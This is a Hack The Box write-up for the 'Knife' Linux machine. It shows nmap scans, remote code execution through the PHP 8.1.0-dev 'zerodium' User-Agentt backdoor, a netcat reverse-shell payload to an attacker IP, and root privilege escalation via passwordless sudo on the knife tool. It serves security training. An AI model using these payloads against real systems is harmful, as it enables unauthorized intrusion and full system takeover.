Welcome to the Knife writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Knife

tags: HTB Easy Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

[email protected]:~/Documents/HTB/Knife$ sudo nmap -sS -n -T5 -p- -oN AllPorts.txt 10.129.109.121
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:08 EDT
Warning: 10.129.109.121 giving up on port because retransmission cap hit (2).
Stats: 0:01:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.60% done; ETC: 16:11 (0:00:38 remaining)
Nmap scan report for 10.129.109.121
Host is up (0.11s latency).
Not shown: 65468 closed ports, 65 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 150.09 seconds

Now that we know the open ports, let's scan them in depth.

[email protected]:~/Documents/HTB/Knife$ sudo nmap -sC -sV -p22,80 -oN PortsDepth.txt 10.129.109.121
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:20 EDT
Nmap scan report for 10.129.109.121
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 seconds

Port 80

Well, looking the X-Powered-By in the website response header we can know that is using the PHP 8.1.0-dev version. Searching on internet about it, we can find a backdoor.

In this link we can view a PoC.
And here is the Backdoor source.

Exploitation

Backdoor

Using the User-Agentt: zerodiumvar_dump(3*3); payload on BURP Suite we can get RCE.

GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
User-Agentt: zerodiumvar_dump(3*3);
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:00:46 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5825
Connection: close
Content-Type: text/html; charset=UTF-8

int(9)
<!DOCTYPE html>

Ok, now we can run system commands using the system() PHP function.

GET / HTTP/1.1
Host: knife.htb

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

User-Agentt: zerodiumvar_dump(system("id"));

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:09:43 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5930
Connection: close
Content-Type: text/html; charset=UTF-8

uid=1000(james) gid=1000(james) groups=1000(james)
string(50) "uid=1000(james) gid=1000(james) groups=1000(james)"
<!DOCTYPE html>

Exploitation

Knowing it, we can get a shell setting a listening terminal and sending this payload.

User-Agentt: zerodiumvar_dump(system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 8787 >/tmp/f"));

Now we can get the user flag.

[email protected]:~$ cat user.txt
CENSORED_FLAG

Post exploitation

Enumeration

Sudo

As we can see, we can execute knife as root without password.

Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Privilege escalation

The knife file is running in ruby. We can use the -s flag to execute our custom script to get root.

[email protected]:~$ sudo knife exec -s http://10.10.14.15
An interactive shell is opened

Type your script and do:

1. To run the script, use 'Ctrl D'
2. To exit, use 'Ctrl/Shift C'

Type here a script...
system("/bin/bash") 
[email protected]:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/james# cat /root/root.txt
CENSORED_FLAG

And that's all folks.